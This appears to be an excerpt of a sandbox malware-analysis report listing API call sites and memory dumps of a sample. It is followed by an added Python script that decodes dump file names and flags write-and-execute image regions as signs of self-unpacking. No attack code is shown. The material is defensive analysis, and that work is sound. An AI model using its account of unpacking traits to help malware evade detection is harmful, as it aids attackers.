                                • lstrcpy.KERNEL32(00000000,?), ref: 00C83497
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: f7ad3fa8a24cc6b79cb8be42e8c96514b6d191b86f2741d6d1213054f3c794be
                                • Instruction ID: 3b195557aac0fd514493cf58f3f7270ff62a82173ad48e4701b170a1714326bb
                                • Opcode Fuzzy Hash: f7ad3fa8a24cc6b79cb8be42e8c96514b6d191b86f2741d6d1213054f3c794be
                                • Instruction Fuzzy Hash: A8121D70A022518FDB18DF19C558B25B7E0BF45B18B1DD0AEE819DB3A2D772EE42CB44
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C87CAF
                                  • Part of subcall function 00C87D40: std::_Xinvalid_argument.LIBCPMT ref: 00C87D58
                                  • Part of subcall function 00C87D40: std::_Xinvalid_argument.LIBCPMT ref: 00C87D76
                                  • Part of subcall function 00C87D40: std::_Xinvalid_argument.LIBCPMT ref: 00C87D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 7008bfa80c171bc1335c8ece172b5c7f252bd5766d95912fc8cae333b4f9ba9d
                                • Instruction ID: b141aa1a98ca4a35d88340df8b996982b0291aa2b33acabb69cea9af8367913e
                                • Opcode Fuzzy Hash: 7008bfa80c171bc1335c8ece172b5c7f252bd5766d95912fc8cae333b4f9ba9d
                                • Instruction Fuzzy Hash: C631C4723086108BD724EE6CE88096AF7E9EF91768B30472BF5568B641E771DD4183AC
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00C76F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C76F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 1f61687b016de029f59b683b999e52d06afcbdac3efdf2e709a2fca22d0d1e13
                                • Instruction ID: 8281e6afb2886d4d7da9395d83fa944da7d5a6108c2ac7f0d1d5408f3b4721da
                                • Opcode Fuzzy Hash: 1f61687b016de029f59b683b999e52d06afcbdac3efdf2e709a2fca22d0d1e13
                                • Instruction Fuzzy Hash: 9A21AEB0600B028FEB208B60DC84BB773E8EB45744F448978F95ACB685F7B4EA45C750
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9244C
                                • lstrlen.KERNEL32(00000000), ref: 00C924E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C92570
                                • lstrlen.KERNEL32(00000000), ref: 00C92577
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 1ea0b9802e7fa519fe761f3f9462e5ec0458cd4e43176a91ed08106baf076b84
                                • Instruction ID: 03c590ab9816c93b4f828e77733539c67cb2b568c46826ea68bd0f33b47f0de1
                                • Opcode Fuzzy Hash: 1ea0b9802e7fa519fe761f3f9462e5ec0458cd4e43176a91ed08106baf076b84
                                • Instruction Fuzzy Hash: FC81E4B1E01205ABDF14DF99DC48BAEB7B5FF94300F188069E548A7381EB359E46CB94
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00C915A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C915D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C91611
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C91649
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: ce0f9d8319792152efedd0d18f9bd3a46ddbc9e7c0f8520e3ca96636c836a414
                                • Instruction ID: d8781ca74bd634338986fa90cd3c699aac572e1e0adce2d680d2e161a77a84f4
                                • Opcode Fuzzy Hash: ce0f9d8319792152efedd0d18f9bd3a46ddbc9e7c0f8520e3ca96636c836a414
                                • Instruction Fuzzy Hash: 3D21F974611B039FDB24DF2AD459A17B7F5EF88710B09891CA8AAC7A41DB30F941CB90
                                APIs
                                  • Part of subcall function 00C71610: lstrcpy.KERNEL32(00000000), ref: 00C7162D
                                  • Part of subcall function 00C71610: lstrcpy.KERNEL32(00000000,?), ref: 00C7164F
                                  • Part of subcall function 00C71610: lstrcpy.KERNEL32(00000000,?), ref: 00C71671
                                  • Part of subcall function 00C71610: lstrcpy.KERNEL32(00000000,?), ref: 00C71693
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 50033c2edb456ae375599c98650433e9edf5b897870d0d95b8d37b4a76192ca9
                                • Instruction ID: 3cdda566f08ffabf9d29124a45fbf2f9312221adeb0a5ea00135a8b768aff1a5
                                • Opcode Fuzzy Hash: 50033c2edb456ae375599c98650433e9edf5b897870d0d95b8d37b4a76192ca9
                                • Instruction Fuzzy Hash: 5431C874A11B029FC768DF3AC588956BBF5FF49305708892DA9AAC3B10DB30F811CB80
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00C7162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71671
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71693
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
• Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: cb17fa42dbb2394d8ff169ecc68bcee8fb1ddc50c7e5f883191c1a816044f2a0
                                • Instruction ID: 1663dc8260c818612d8c91e63a0975eba6557e567b4e170a838376d2c2c9447c
                                • Opcode Fuzzy Hash: cb17fa42dbb2394d8ff169ecc68bcee8fb1ddc50c7e5f883191c1a816044f2a0
                                • Instruction Fuzzy Hash: A111EF74A127029BD7649F7AD458927B7F8FF4570170C852DB89AC3A41EB30F901CB50
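The memory-dump file names listed under "Memory Dump Source" above carry the region's base address and its page protection, which is the information behind the report's "changes PE section rights" signature: the dump covering 00C71000 sits inside the mapped image (memory type 01000000, MEM_IMAGE) yet carries protection 00000040 (PAGE_EXECUTE_READWRITE). The script below is an added example, written for this page and not part of Joe Sandbox or its report; it decodes those names and lists the image regions that are both writable and executable. The field layout it assumes (field 4 = base address, field 5 = protection, field 7 = memory type, the others left uninterpreted) is inferred from the names on this page, not from Joe Sandbox documentation; the PAGE_* and MEM_* values are the winnt.h constants. The sample list is copied from the listing above.

```python
"""Decode Joe Sandbox .sdmp dump names and flag write+execute image regions."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# winnt.h page-protection constants (exact values).
PAGE_NOACCESS          = 0x01
PAGE_READONLY          = 0x02
PAGE_READWRITE         = 0x04
PAGE_WRITECOPY         = 0x08
PAGE_EXECUTE           = 0x10
PAGE_EXECUTE_READ      = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

# winnt.h MEMORY_BASIC_INFORMATION.Type values (exact values).
MEM_PRIVATE = 0x20000
MEM_MAPPED  = 0x40000
MEM_IMAGE   = 0x1000000

PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# ASSUMED layout, inferred from the names on this page (not documented here):
#   <f0>.<f1>.<dump id>.<base address>.<protection>.<f5>.<memory type>.<f7>.sdmp
# Only base address, protection and memory type are decoded; the rest is captured as-is.
SDMP_RE = re.compile(
    r"^(?P<f0>[0-9A-Fa-f]{8})\.(?P<f1>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f5>[0-9A-Fa-f]{8})\."
    r"(?P<mem_type>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PROTECT_NAMES.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def write_execute(self) -> bool:
        # Pages that are writable and executable at once: the footprint of in-place unpacking.
        return bool(self.protect & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY))

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(name=name.strip(), base=int(m["base"], 16),
                      protect=int(m["protect"], 16), mem_type=int(m["mem_type"], 16))


def write_execute_image_regions(names: Iterable[str]) -> List[DumpRegion]:
    """Regions inside a mapped image that carry a write+execute protection, lowest base first."""
    regions = (parse_sdmp_name(n) for n in names)
    return sorted((r for r in regions if r.is_image and r.write_execute), key=lambda r: r.base)


def lowest_image_base(names: Iterable[str]) -> int:
    """Lowest base among MEM_IMAGE regions; here it matches the report's 'Offset: 00C70000'."""
    return min(r.base for r in map(parse_sdmp_name, names) if r.is_image)


# Dump names copied from the report listing above.
SAMPLE_DUMPS = [
    "00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp",
    "00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for r in write_execute_image_regions(SAMPLE_DUMPS):
        print(f"{r.base:#010x}  {r.protect_name:24s}  {MEM_TYPE_NAMES.get(r.mem_type, hex(r.mem_type))}")
    print(f"lowest image base: {lowest_image_base(SAMPLE_DUMPS):#x}")
```

On this listing only the two 00000004 (PAGE_READWRITE) regions at 00C70000 and 00EBA000 fall outside the write+execute set; every other image region, including the one holding the lstrcpy call sites above, is PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY, which is what an unpacker that rewrites its own code section leaves behind and what the "Detected unpacking (changes PE section rights)" signature keys on. A normally mapped image would show its code as PAGE_EXECUTE_READ and its data as PAGE_WRITECOPY or PAGE_READWRITE.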